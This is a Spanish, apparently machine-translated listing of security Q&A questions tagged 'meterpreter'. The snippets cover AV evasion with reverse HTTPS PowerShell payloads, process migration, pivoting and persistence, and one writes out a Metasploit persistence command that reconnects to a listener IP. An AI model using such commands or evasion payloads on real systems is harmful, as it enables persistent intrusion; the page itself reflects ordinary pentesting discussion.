Preguntas con etiqueta 'meterpreter'

preguntas con etiqueta
2
respuestas

Medidor HTTPS detectado por IPS

Estoy ocupado con las pruebas de seguridad en una red de clientes y me pidieron que muestre qué tan fácil es la evasión AV. Creé un buen archivo HTTPS inverso de PowerShell a través de la evasión de velo, que no es detectado por Symantec Virussc...
hecha 09.01.2017 - 09:09
2
respuestas

¿El shell de Meterpreter y el shell del sistema definen?

¿Cuál es la diferencia entre el shell Meterpreter y el shell del sistema? Por ejemplo, si encontré alguna vulnerabilidad en un sistema que permitiera ambos shells, ¿a qué debería recurrir, shell del sistema o Meterpreter ? ¿Qué tipo de co...
hecha 30.06.2018 - 07:05
1
respuesta

¿Cómo se migra 32 bit Meterpreter al proceso de 64 bit?

Si tiene un Meterpreter de 32 bits ejecutándose en un sistema remoto de 64 bits, puede migrar a procesos de 64 bits. Esto no es nada nuevo y ha sido usado por malware durante años, pero lo que me hace pensar es cómo hace esto en Windows 10?...
hecha 14.01.2017 - 23:24
2
respuestas

No estoy recibiendo sesiones de meterpreter cuando estoy conectado a un Openvpn

Tengo un enrutador y los puertos necesarios para que la puerta trasera se vuelva a conectar al oyente se reenvían a la dirección IP interna de mi máquina. Todo funciona bien solo cuando no estoy usando VPN. Pero después de conectarme a una VP...
hecha 16.06.2017 - 17:25
1
respuesta

Actualizar shell a meterpreter detrás de NAT

He estado jugando con Metasploit la semana pasada, y pude obtener con éxito un shell básico de la víctima a través de Internet. Actualmente tengo: Creó un DDNS que apunta a mi IP pública Configure el reenvío de puertos para todos los pue...
hecha 24.09.2015 - 03:34
1
respuesta

¿Cómo funciona la persistencia de metasploit?

Cuando explotamos de forma remota un objetivo con meterpreter, podemos usar el comando run persistence -U -i 10 -p 12345 -r 192.168.1.1 para hacer que un programa persistente intente conectarse a la máquina cuya dirección IP sea 192.168....
hecha 03.04.2016 - 16:41
1
respuesta

¿Qué hace que una carga útil de powershell se ejecute la primera vez pero no la segunda?

Creé una carga útil windows / meterpreter / reverse_https powershell usando el script de python que se proporciona al final de este artículo . En la primera ejecución, la sesión de meterpreter se abrió con éxito, cuando la cerré y traté de ejec...
hecha 09.03.2014 - 14:23
1
respuesta

error de SSL del medidor después de la suspensión

Mientras uso mucho las metasploit en pentests, comienzo a usar el comando sleep meterpreter. Entiendo que este no es un método de persistencia, pero a veces es muy conveniente. Lamentablemente, cuando las sesiones se activan, no logran esta...
hecha 01.10.2016 - 16:18
1
respuesta

Metasploit: girando hacia la máquina sin acceso a Internet

Imaginemos el siguiente escenario (no infrecuente): Estoy haciendo un pentest desde afuera Tengo una sesión de meterpreter desde una PC de la empresa que está dentro de su infraestructura (Digamos w / reverse HTTPS) Digamos que conozco e...
hecha 21.04.2018 - 20:59
1
respuesta

Meterpreter en Iphone no jailbreak [cerrado]

Encontré esto en github: enlace ¿Alguien sabe si esto funciona en un Iphone sin jailbreak? Lo descargué en mi y hice doble clic en el ícono de Makefile, dentro del directorio OSX, pero mi sistema operativo sigue diciendo: "Makefile" no s...
hecha 18.12.2014 - 14:45